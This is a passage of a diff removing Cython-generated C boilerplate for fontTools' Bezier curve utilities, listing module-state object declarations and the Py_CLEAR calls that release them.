*__pyx_n_s_c1x; - PyObject *__pyx_n_s_c1y; - PyObject *__pyx_n_s_c21; - PyObject *__pyx_n_s_c21_range; - PyObject *__pyx_n_s_c22; - PyObject *__pyx_n_s_c22_range; - PyObject *__pyx_n_s_calcBounds; - PyObject *__pyx_n_s_calcCubicArcLength; - PyObject *__pyx_n_u_calcCubicArcLength; - PyObject *__pyx_n_s_calcCubicArcLengthC; - PyObject *__pyx_n_u_calcCubicArcLengthC; - PyObject *__pyx_n_s_calcCubicArcLengthCRecurse; - PyObject *__pyx_n_s_calcCubicBounds; - PyObject *__pyx_n_u_calcCubicBounds; - PyObject *__pyx_kp_u_calcCubicBounds_line_412; - PyObject *__pyx_n_s_calcCubicParameters; - PyObject *__pyx_n_s_calcCubicPoints; - PyObject *__pyx_n_s_calcQuadraticArcLength; - PyObject *__pyx_n_u_calcQuadraticArcLength; - PyObject *__pyx_n_s_calcQuadraticArcLengthC; - PyObject *__pyx_n_u_calcQuadraticArcLengthC; - PyObject *__pyx_kp_u_calcQuadraticArcLength_line_151; - PyObject *__pyx_n_s_calcQuadraticBounds; - PyObject *__pyx_n_u_calcQuadraticBounds; - PyObject *__pyx_kp_u_calcQuadraticBounds_line_298; - PyObject *__pyx_n_s_calcQuadraticParameters; - PyObject *__pyx_n_s_calcQuadraticPoints; - PyObject *__pyx_n_s_class_getitem; - PyObject *__pyx_n_s_cline_in_traceback; - PyObject *__pyx_n_s_close; - PyObject *__pyx_n_s_collections; - PyObject *__pyx_n_s_cos; - PyObject *__pyx_n_s_cubicPointAtT; - PyObject *__pyx_n_u_cubicPointAtT; - PyObject *__pyx_n_s_cubicPointAtTC; - PyObject *__pyx_n_u_cubicPointAtTC; - PyObject *__pyx_n_s_curve; - PyObject *__pyx_n_s_curve1; - PyObject *__pyx_n_s_curve2; - PyObject *__pyx_n_s_curveCurveIntersections; - PyObject *__pyx_n_u_curveCurveIntersections; - PyObject *__pyx_kp_u_curveCurveIntersections_line_137; - PyObject *__pyx_n_s_curveLineIntersections; - PyObject *__pyx_n_u_curveLineIntersections; - PyObject *__pyx_kp_u_curveLineIntersections_line_1248; - PyObject *__pyx_n_s_curve_bounds; - PyObject *__pyx_n_s_curve_curve_intersections_t; - PyObject *__pyx_n_s_curve_curve_intersections_t_loc; - PyObject *__pyx_n_s_curve_curve_intersections_t_loc_2; - PyObject *__pyx_n_s_curve_line_intersections_t; - PyObject *__pyx_n_s_curve_line_intersections_t_loca; - PyObject *__pyx_n_s_cx; - PyObject *__pyx_n_s_cy; - PyObject *__pyx_n_s_cython; - PyObject *__pyx_n_s_d; - PyObject *__pyx_n_s_d0; - PyObject *__pyx_n_s_d1; - PyObject *__pyx_n_s_d1x; - PyObject *__pyx_n_s_d1y; - PyObject *__pyx_n_s_delta; - PyObject *__pyx_n_s_delta_2; - PyObject *__pyx_n_s_delta_3; - PyObject *__pyx_n_s_deriv3; - PyObject *__pyx_kp_u_disable; - PyObject *__pyx_n_s_doctest; - PyObject *__pyx_n_s_dx; - PyObject *__pyx_n_s_dy; - PyObject *__pyx_n_s_e; - PyObject *__pyx_n_s_e1; - PyObject *__pyx_n_s_e1x; - PyObject *__pyx_n_s_e1y; - PyObject *__pyx_n_s_e2; - PyObject *__pyx_n_s_e2x; - PyObject *__pyx_n_s_e2y; - PyObject *__pyx_kp_u_enable; - PyObject *__pyx_n_s_end; - PyObject *__pyx_n_s_epsilon; - PyObject *__pyx_n_s_epsilonDigits; - PyObject *__pyx_n_s_ex; - PyObject *__pyx_n_s_exit; - PyObject *__pyx_n_s_ey; - PyObject *__pyx_n_s_failed; - PyObject *__pyx_n_s_fontTools_misc; - PyObject *__pyx_n_s_fontTools_misc_arrayTools; - PyObject *__pyx_n_s_fontTools_misc_bezierTools; - PyObject *__pyx_n_s_fontTools_misc_transform; - PyObject *__pyx_n_s_found; - PyObject *__pyx_kp_u_g; - PyObject *__pyx_kp_u_gc; - PyObject *__pyx_n_s_genexpr; - PyObject *__pyx_n_s_i; - PyObject *__pyx_n_s_import; - PyObject *__pyx_n_s_initializing; - PyObject *__pyx_n_s_insert; - PyObject *__pyx_n_s_intersection_ts; - PyObject *__pyx_n_s_intersections; - PyObject *__pyx_n_s_intersects; - PyObject *__pyx_n_s_isHorizontal; - PyObject *__pyx_n_s_is_coroutine; - PyObject *__pyx_n_s_isclose; - PyObject *__pyx_kp_u_isenabled; - PyObject *__pyx_n_s_it; - PyObject *__pyx_n_s_key; - PyObject *__pyx_n_s_line; - PyObject *__pyx_n_s_lineLineIntersections; - PyObject *__pyx_n_u_lineLineIntersections; - PyObject *__pyx_kp_u_lineLineIntersections_line_1147; - PyObject *__pyx_n_s_linePointAtT; - PyObject *__pyx_n_u_linePointAtT; - PyObject *__pyx_n_s_line_t; - PyObject *__pyx_n_s_line_t_of_pt; - PyObject *__pyx_n_s_main; - PyObject *__pyx_n_u_main; - PyObject *__pyx_n_s_math; - PyObject *__pyx_n_s_mid; - PyObject *__pyx_n_s_midPt; - PyObject *__pyx_n_s_midpoint; - PyObject *__pyx_n_s_mult; - PyObject *__pyx_n_s_n; - PyObject *__pyx_n_s_name; - PyObject *__pyx_n_s_namedtuple; - PyObject *__pyx_n_s_obj; - PyObject *__pyx_n_s_off1; - PyObject *__pyx_n_s_off2; - PyObject *__pyx_n_s_one; - PyObject *__pyx_n_s_origDist; - PyObject *__pyx_n_s_origin; - PyObject *__pyx_n_s_p0; - PyObject *__pyx_n_s_p1; - PyObject *__pyx_n_s_p2; - PyObject *__pyx_n_s_p3; - PyObject *__pyx_n_s_pi; - PyObject *__pyx_n_s_pointAtT; - PyObject *__pyx_n_s_pointFinder; - PyObject *__pyx_n_s_points; - PyObject *__pyx_n_s_precision; - PyObject *__pyx_n_s_print; - PyObject *__pyx_n_s_printSegments; - PyObject *__pyx_n_s_pt; - PyObject *__pyx_n_u_pt; - PyObject *__pyx_n_s_pt1; - PyObject *__pyx_n_s_pt1x; - PyObject *__pyx_n_s_pt1y; - PyObject *__pyx_n_s_pt2; - PyObject *__pyx_n_s_pt2x; - PyObject *__pyx_n_s_pt2y; - PyObject *__pyx_n_s_pt3; - PyObject *__pyx_n_s_pt4; - PyObject *__pyx_n_s_px; - PyObject *__pyx_n_s_py; - PyObject *__pyx_n_s_quadraticPointAtT; - PyObject *__pyx_n_u_quadraticPointAtT; - PyObject *__pyx_n_s_r; - PyObject *__pyx_n_s_rDD; - PyObject *__pyx_n_s_rQ2; - PyObject *__pyx_n_s_range; - PyObject *__pyx_n_s_range1; - PyObject *__pyx_n_s_range2; - PyObject *__pyx_n_s_rectArea; - PyObject *__pyx_n_s_roots; - PyObject *__pyx_n_s_rotate; - PyObject *__pyx_n_s_round; - PyObject *__pyx_n_s_s; - PyObject *__pyx_n_s_s1; - PyObject *__pyx_n_s_s1x; - PyObject *__pyx_n_s_s1y; - PyObject *__pyx_n_s_s2; - PyObject *__pyx_n_s_s2x; - PyObject *__pyx_n_s_s2y; - PyObject *__pyx_kp_u_s_2; - PyObject *__pyx_n_s_scale; - PyObject *__pyx_n_s_sectRect; - PyObject *__pyx_n_s_seen; - PyObject *__pyx_n_s_seg; - PyObject *__pyx_n_s_seg1; - PyObject *__pyx_n_s_seg2; - PyObject *__pyx_n_s_segment; - PyObject *__pyx_n_s_segmentPointAtT; - PyObject *__pyx_n_u_segmentPointAtT; - PyObject *__pyx_n_s_segmentSegmentIntersections; - PyObject *__pyx_n_u_segmentSegmentIntersections; - PyObject *__pyx_kp_u_segmentSegmentIntersections_line; - PyObject *__pyx_n_s_segmentrepr; - PyObject *__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2; - PyObject *__pyx_kp_u_segmentrepr_line_1449; - PyObject *__pyx_n_s_segmentrepr_locals_genexpr; - PyObject *__pyx_n_s_segments; - PyObject *__pyx_n_s_send; - PyObject *__pyx_n_s_slope12; - PyObject *__pyx_n_s_slope34; - PyObject *__pyx_n_s_solutions; - PyObject *__pyx_n_s_solveCubic; - PyObject *__pyx_n_u_solveCubic; - PyObject *__pyx_kp_u_solveCubic_line_841; - PyObject *__pyx_n_s_solveQuadratic; - PyObject *__pyx_n_u_solveQuadratic; - PyObject *__pyx_n_s_spec; - PyObject *__pyx_n_s_splitCubic; - PyObject *__pyx_n_u_splitCubic; - PyObject *__pyx_n_s_splitCubicAtT; - PyObject *__pyx_n_s_splitCubicAtTC; - PyObject *__pyx_n_u_splitCubicAtTC; - PyObject *__pyx_n_s_splitCubicAtTC_2; - PyObject *__pyx_n_s_splitCubicAtT_2; - PyObject *__pyx_n_u_splitCubicAtT_2; - PyObject *__pyx_kp_u_splitCubicAtT_line_613; - PyObject *__pyx_n_s_splitCubicIntoTwoAtTC; - PyObject *__pyx_n_u_splitCubicIntoTwoAtTC; - PyObject *__pyx_kp_u_splitCubic_line_552; - PyObject *__pyx_n_s_splitCubic_locals_genexpr; - PyObject *__pyx_n_s_splitLine; - PyObject *__pyx_n_u_splitLine; - PyObject *__pyx_kp_u_splitLine_line_450; - PyObject *__pyx_n_s_splitQuadratic; - PyObject *__pyx_n_u_splitQuadratic; - PyObject *__pyx_n_s_splitQuadraticAtT; - PyObject *__pyx_n_s_splitQuadraticAtT_2; - PyObject *__pyx_n_u_splitQuadraticAtT_2; - PyObject *__pyx_kp_u_splitQuadraticAtT_line_589; - PyObject *__pyx_kp_u_splitQuadratic_line_507; - PyObject *__pyx_n_s_splitQuadratic_locals_genexpr; - PyObject *__pyx_n_s_split_cubic_into_two; - PyObject *__pyx_n_s_split_segment_at_t; - PyObject *__pyx_n_s_sqrt; - PyObject *__pyx_n_s_start; - PyObject *__pyx_n_s_swapped; - PyObject *__pyx_n_s_sx; - PyObject *__pyx_n_s_sy; - PyObject *__pyx_n_s_sys; - PyObject *__pyx_n_s_t; - PyObject *__pyx_n_s_t1; - PyObject *__pyx_n_u_t1; - PyObject *__pyx_n_s_t1_2; - PyObject *__pyx_n_s_t1_3; - PyObject *__pyx_n_s_t2; - PyObject *__pyx_n_u_t2; - PyObject *__pyx_n_s_test; - PyObject *__pyx_n_s_testmod; - PyObject *__pyx_n_s_theta; - PyObject *__pyx_n_s_throw; - PyObject *__pyx_n_s_tolerance; - PyObject *__pyx_n_s_transformPoints; - PyObject *__pyx_n_s_translate; - PyObject *__pyx_n_s_ts; - PyObject *__pyx_n_s_two; - PyObject *__pyx_n_s_unique_key; - PyObject *__pyx_n_s_unique_values; - PyObject *__pyx_n_s_v0; - PyObject *__pyx_n_s_v1; - PyObject *__pyx_n_s_v2; - PyObject *__pyx_n_s_v3; - PyObject *__pyx_n_s_v4; - PyObject *__pyx_n_s_where; - PyObject *__pyx_n_s_x; - PyObject *__pyx_n_s_x0; - PyObject *__pyx_n_s_x1; - PyObject *__pyx_n_s_x2; - PyObject *__pyx_n_s_x3; - PyObject *__pyx_n_s_x4; - PyObject *__pyx_n_s_xDiff; - PyObject *__pyx_n_s_xRoots; - PyObject *__pyx_n_s_y; - PyObject *__pyx_n_s_y1; - PyObject *__pyx_n_s_y2; - PyObject *__pyx_n_s_y3; - PyObject *__pyx_n_s_y4; - PyObject *__pyx_n_s_yDiff; - PyObject *__pyx_n_s_yRoots; - PyObject *__pyx_float_0_0; - PyObject *__pyx_float_0_5; - PyObject *__pyx_float_1_0; - PyObject *__pyx_float_2_0; - PyObject *__pyx_float_3_0; - PyObject *__pyx_float_4_0; - PyObject *__pyx_float_9_0; - PyObject *__pyx_float_1eneg_3; - PyObject *__pyx_float_27_0; - PyObject *__pyx_float_54_0; - PyObject *__pyx_float_0_005; - PyObject *__pyx_float_0_125; - PyObject *__pyx_float_1eneg_10; - PyObject *__pyx_float_neg_2_0; - PyObject *__pyx_int_0; - PyObject *__pyx_int_1; - PyObject *__pyx_int_2; - PyObject *__pyx_int_3; - PyObject *__pyx_int_6; - PyObject *__pyx_int_neg_1; - PyObject *__pyx_codeobj_; - PyObject *__pyx_tuple__2; - PyObject *__pyx_tuple__4; - PyObject *__pyx_tuple__5; - PyObject *__pyx_tuple__6; - PyObject *__pyx_tuple__8; - PyObject *__pyx_tuple__12; - PyObject *__pyx_tuple__14; - PyObject *__pyx_tuple__15; - PyObject *__pyx_tuple__17; - PyObject *__pyx_tuple__19; - PyObject *__pyx_tuple__21; - PyObject *__pyx_tuple__23; - PyObject *__pyx_tuple__26; - PyObject *__pyx_tuple__28; - PyObject *__pyx_tuple__30; - PyObject *__pyx_tuple__32; - PyObject *__pyx_tuple__34; - PyObject *__pyx_tuple__36; - PyObject *__pyx_tuple__38; - PyObject *__pyx_tuple__40; - PyObject *__pyx_tuple__42; - PyObject *__pyx_tuple__44; - PyObject *__pyx_tuple__46; - PyObject *__pyx_tuple__48; - PyObject *__pyx_tuple__50; - PyObject *__pyx_tuple__52; - PyObject *__pyx_tuple__53; - PyObject *__pyx_tuple__55; - PyObject *__pyx_tuple__57; - PyObject *__pyx_tuple__59; - PyObject *__pyx_tuple__61; - PyObject *__pyx_tuple__63; - PyObject *__pyx_tuple__65; - PyObject *__pyx_tuple__67; - PyObject *__pyx_tuple__69; - PyObject *__pyx_tuple__71; - PyObject *__pyx_tuple__73; - PyObject *__pyx_tuple__75; - PyObject *__pyx_tuple__77; - PyObject *__pyx_tuple__79; - PyObject *__pyx_tuple__81; - PyObject *__pyx_tuple__83; - PyObject *__pyx_tuple__85; - PyObject *__pyx_tuple__87; - PyObject *__pyx_tuple__89; - PyObject *__pyx_tuple__92; - PyObject *__pyx_tuple__94; - PyObject *__pyx_tuple__95; - PyObject *__pyx_tuple__97; - PyObject *__pyx_tuple__99; - PyObject *__pyx_codeobj__3; - PyObject *__pyx_codeobj__7; - PyObject *__pyx_tuple__101; - PyObject *__pyx_codeobj__13; - PyObject *__pyx_codeobj__16; - PyObject *__pyx_codeobj__18; - PyObject *__pyx_codeobj__20; - PyObject *__pyx_codeobj__22; - PyObject *__pyx_codeobj__24; - PyObject *__pyx_codeobj__25; - PyObject *__pyx_codeobj__27; - PyObject *__pyx_codeobj__29; - PyObject *__pyx_codeobj__31; - PyObject *__pyx_codeobj__33; - PyObject *__pyx_codeobj__35; - PyObject *__pyx_codeobj__37; - PyObject *__pyx_codeobj__39; - PyObject *__pyx_codeobj__41; - PyObject *__pyx_codeobj__43; - PyObject *__pyx_codeobj__45; - PyObject *__pyx_codeobj__47; - PyObject *__pyx_codeobj__49; - PyObject *__pyx_codeobj__51; - PyObject *__pyx_codeobj__54; - PyObject *__pyx_codeobj__56; - PyObject *__pyx_codeobj__58; - PyObject *__pyx_codeobj__60; - PyObject *__pyx_codeobj__62; - PyObject *__pyx_codeobj__64; - PyObject *__pyx_codeobj__66; - PyObject *__pyx_codeobj__68; - PyObject *__pyx_codeobj__70; - PyObject *__pyx_codeobj__72; - PyObject *__pyx_codeobj__74; - PyObject *__pyx_codeobj__76; - PyObject *__pyx_codeobj__78; - PyObject *__pyx_codeobj__80; - PyObject *__pyx_codeobj__82; - PyObject *__pyx_codeobj__84; - PyObject *__pyx_codeobj__86; - PyObject *__pyx_codeobj__88; - PyObject *__pyx_codeobj__90; - PyObject *__pyx_codeobj__93; - PyObject *__pyx_codeobj__96; - PyObject *__pyx_codeobj__98; - PyObject *__pyx_codeobj__100; - PyObject *__pyx_codeobj__102; -} __pyx_mstate; - -#if CYTHON_USE_MODULE_STATE -#ifdef __cplusplus -namespace { - extern struct PyModuleDef __pyx_moduledef; -} /* anonymous namespace */ -#else -static struct PyModuleDef __pyx_moduledef; -#endif - -#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) - -#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) - -#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) -#else -static __pyx_mstate __pyx_mstate_global_static = -#ifdef __cplusplus - {}; -#else - {0}; -#endif -static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; -#endif -/* #### Code section: module_state_clear ### */ -#if CYTHON_USE_MODULE_STATE -static int __pyx_m_clear(PyObject *m) { - __pyx_mstate *clear_module_state = __pyx_mstate(m); - if (!clear_module_state) return 0; - Py_CLEAR(clear_module_state->__pyx_d); - Py_CLEAR(clear_module_state->__pyx_b); - Py_CLEAR(clear_module_state->__pyx_cython_runtime); - Py_CLEAR(clear_module_state->__pyx_empty_tuple); - Py_CLEAR(clear_module_state->__pyx_empty_bytes); - Py_CLEAR(clear_module_state->__pyx_empty_unicode); - #ifdef __Pyx_CyFunction_USED - Py_CLEAR(clear_module_state->__pyx_CyFunctionType); - #endif - #ifdef __Pyx_FusedFunction_USED - Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); - #endif - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr); - Py_CLEAR(clear_module_state->__pyx_n_s_1_t); - Py_CLEAR(clear_module_state->__pyx_n_s_1_t_2); - Py_CLEAR(clear_module_state->__pyx_n_s_2_t_1_t); - Py_CLEAR(clear_module_state->__pyx_kp_u_Approximates_the_arc_length_for); - Py_CLEAR(clear_module_state->__pyx_n_s_AttributeError); - Py_CLEAR(clear_module_state->__pyx_n_s_COMPILED); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_arc_length_for_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl); - Py_CLEAR(clear_module_state->__pyx_kp_u_Calculates_the_bounding_rectangl_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_Couldn_t_work_out_which_intersec); - Py_CLEAR(clear_module_state->__pyx_n_s_DD); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_a_cu); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_a_cu_2); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_two); - Py_CLEAR(clear_module_state->__pyx_kp_u_Finds_intersections_between_two_2); - Py_CLEAR(clear_module_state->__pyx_n_s_Identity); - Py_CLEAR(clear_module_state->__pyx_n_s_ImportError); - Py_CLEAR(clear_module_state->__pyx_n_s_Intersection); - Py_CLEAR(clear_module_state->__pyx_n_u_Intersection); - Py_CLEAR(clear_module_state->__pyx_n_s_Len); - Py_CLEAR(clear_module_state->__pyx_kp_s_Lib_fontTools_misc_bezierTools_p); - Py_CLEAR(clear_module_state->__pyx_n_s_Q); - Py_CLEAR(clear_module_state->__pyx_n_s_Q3); - Py_CLEAR(clear_module_state->__pyx_n_s_R); - Py_CLEAR(clear_module_state->__pyx_n_s_R2); - Py_CLEAR(clear_module_state->__pyx_n_s_R2_Q3); - Py_CLEAR(clear_module_state->__pyx_kp_u_Solve_a_cubic_equation_Solves_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_line_at_a_given_coordina); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a); - Py_CLEAR(clear_module_state->__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2); - Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); - Py_CLEAR(clear_module_state->__pyx_kp_u_Unknown_curve_degree); - Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); - Py_CLEAR(clear_module_state->__pyx_kp_u__10); - Py_CLEAR(clear_module_state->__pyx_n_s__103); - Py_CLEAR(clear_module_state->__pyx_n_s__11); - Py_CLEAR(clear_module_state->__pyx_kp_u__9); - Py_CLEAR(clear_module_state->__pyx_n_s__91); - Py_CLEAR(clear_module_state->__pyx_n_s_a); - Py_CLEAR(clear_module_state->__pyx_n_s_a1); - Py_CLEAR(clear_module_state->__pyx_n_s_a1_3); - Py_CLEAR(clear_module_state->__pyx_n_s_a1x); - Py_CLEAR(clear_module_state->__pyx_n_s_a1y); - Py_CLEAR(clear_module_state->__pyx_n_s_a2); - Py_CLEAR(clear_module_state->__pyx_n_s_a3); - Py_CLEAR(clear_module_state->__pyx_n_s_acos); - Py_CLEAR(clear_module_state->__pyx_n_s_aligned_curve); - Py_CLEAR(clear_module_state->__pyx_n_s_alignment_transformation); - Py_CLEAR(clear_module_state->__pyx_n_s_all); - Py_CLEAR(clear_module_state->__pyx_n_s_angle); - Py_CLEAR(clear_module_state->__pyx_n_s_append); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_kp_u_approximateCubicArcLength_line_3); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_approximateQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_approximateQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_s_arch); - Py_CLEAR(clear_module_state->__pyx_n_s_args); - Py_CLEAR(clear_module_state->__pyx_n_s_asinh); - Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); - Py_CLEAR(clear_module_state->__pyx_n_s_atan2); - Py_CLEAR(clear_module_state->__pyx_n_s_ax); - Py_CLEAR(clear_module_state->__pyx_n_s_ax2); - Py_CLEAR(clear_module_state->__pyx_n_s_ax3); - Py_CLEAR(clear_module_state->__pyx_n_s_ay); - Py_CLEAR(clear_module_state->__pyx_n_s_ay2); - Py_CLEAR(clear_module_state->__pyx_n_s_ay3); - Py_CLEAR(clear_module_state->__pyx_n_s_b); - Py_CLEAR(clear_module_state->__pyx_n_s_b1); - Py_CLEAR(clear_module_state->__pyx_n_s_b1x); - Py_CLEAR(clear_module_state->__pyx_n_s_b1y); - Py_CLEAR(clear_module_state->__pyx_n_s_both_points_are_on_same_side_of); - Py_CLEAR(clear_module_state->__pyx_n_s_bounds1); - Py_CLEAR(clear_module_state->__pyx_n_s_bounds2); - Py_CLEAR(clear_module_state->__pyx_n_s_box); - Py_CLEAR(clear_module_state->__pyx_n_s_bx); - Py_CLEAR(clear_module_state->__pyx_n_s_bx2); - Py_CLEAR(clear_module_state->__pyx_n_s_by); - Py_CLEAR(clear_module_state->__pyx_n_s_by2); - Py_CLEAR(clear_module_state->__pyx_n_s_c); - Py_CLEAR(clear_module_state->__pyx_n_s_c1); - Py_CLEAR(clear_module_state->__pyx_n_s_c11); - Py_CLEAR(clear_module_state->__pyx_n_s_c11_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c12); - Py_CLEAR(clear_module_state->__pyx_n_s_c12_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c1x); - Py_CLEAR(clear_module_state->__pyx_n_s_c1y); - Py_CLEAR(clear_module_state->__pyx_n_s_c21); - Py_CLEAR(clear_module_state->__pyx_n_s_c21_range); - Py_CLEAR(clear_module_state->__pyx_n_s_c22); - Py_CLEAR(clear_module_state->__pyx_n_s_c22_range); - Py_CLEAR(clear_module_state->__pyx_n_s_calcBounds); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicArcLengthCRecurse); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicBounds); - Py_CLEAR(clear_module_state->__pyx_n_u_calcCubicBounds); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcCubicBounds_line_412); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicParameters); - Py_CLEAR(clear_module_state->__pyx_n_s_calcCubicPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticArcLength); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticArcLengthC); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcQuadraticArcLength_line_151); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticBounds); - Py_CLEAR(clear_module_state->__pyx_n_u_calcQuadraticBounds); - Py_CLEAR(clear_module_state->__pyx_kp_u_calcQuadraticBounds_line_298); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticParameters); - Py_CLEAR(clear_module_state->__pyx_n_s_calcQuadraticPoints); - Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); - Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); - Py_CLEAR(clear_module_state->__pyx_n_s_close); - Py_CLEAR(clear_module_state->__pyx_n_s_collections); - Py_CLEAR(clear_module_state->__pyx_n_s_cos); - Py_CLEAR(clear_module_state->__pyx_n_s_cubicPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_u_cubicPointAtT); - Py_CLEAR(clear_module_state->__pyx_n_s_cubicPointAtTC); - Py_CLEAR(clear_module_state->__pyx_n_u_cubicPointAtTC); - Py_CLEAR(clear_module_state->__pyx_n_s_curve); - Py_CLEAR(clear_module_state->__pyx_n_s_curve1); - Py_CLEAR(clear_module_state->__pyx_n_s_curve2); - Py_CLEAR(clear_module_state->__pyx_n_s_curveCurveIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_curveCurveIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_curveCurveIntersections_line_137); - Py_CLEAR(clear_module_state->__pyx_n_s_curveLineIntersections); - Py_CLEAR(clear_module_state->__pyx_n_u_curveLineIntersections); - Py_CLEAR(clear_module_state->__pyx_kp_u_curveLineIntersections_line_1248); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_bounds); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t_loc); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_curve_intersections_t_loc_2); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_line_intersections_t); - Py_CLEAR(clear_module_state->__pyx_n_s_curve_line_intersections_t_loca); - Py_CLEAR(clear_module_state->__pyx_n_s_cx); - Py_CLEAR(clear_module_state->__pyx_n_s_cy); - Py_CLEAR(clear_module_state->__pyx_n_s_cython); - Py_CLEAR(clear_module_state->__pyx_n_s_d); - Py_CLEAR(clear_module_state->__pyx_n_s_d0); - Py_CLEAR(clear_module_state->__pyx_n_s_d1); - Py_CLEAR(clear_module_state->__pyx_n_s_d1x); - Py_CLEAR(clear_module_state->__pyx_n_s_d1y); - Py_CLEAR(clear_module_state->__pyx_n_s_delta); - Py_CLEAR(clear_module_state->__pyx_n_s_delta_2); - Py_CLEAR(clear_module_state->__pyx_n_s_delta_3); - Py_CLEAR(clear_module_state->__pyx_n_s_deriv3); - Py_CLEAR(clear_module_state->__pyx_kp_u_disable); - Py_CLEAR(clear_module_state->__pyx_n_s_doctest); - Py_CLEAR(clear_module_state->__pyx_n_s_dx); - Py_CLEAR(clear_module_state->__pyx_n_s_dy); - Py_CLEAR(clear_module_state->__pyx_n_s_e); - Py_CLEAR(clear_module_state->__pyx_n_s_e1); - Py_CLEAR(clear_module_state->__pyx_n_s_e1x); - Py_CLEAR(clear_module_state->__pyx_n_s_e1y); - Py_CLEAR(clear_module_state->__pyx_n_s_e2); - Py_CLEAR(clear_module_state->__pyx_n_s_e2x); - Py_CLEAR(clear_module_state->__pyx_n_s_e2y); - Py_CLEAR(clear_module_state->__pyx_kp_u_enable); - Py_CLEAR(clear_module_state->__pyx_n_s_end); - Py_CLEAR(clear_module_state->__pyx_n_s_epsilon); - Py_CLEAR(clear_module_state->__pyx_n_s_epsilonDigits); - Py_CLEAR(clear_module_state->__pyx_n_s_ex); - Py_CLEAR(clear_module_state->__pyx_n_s_exit); - 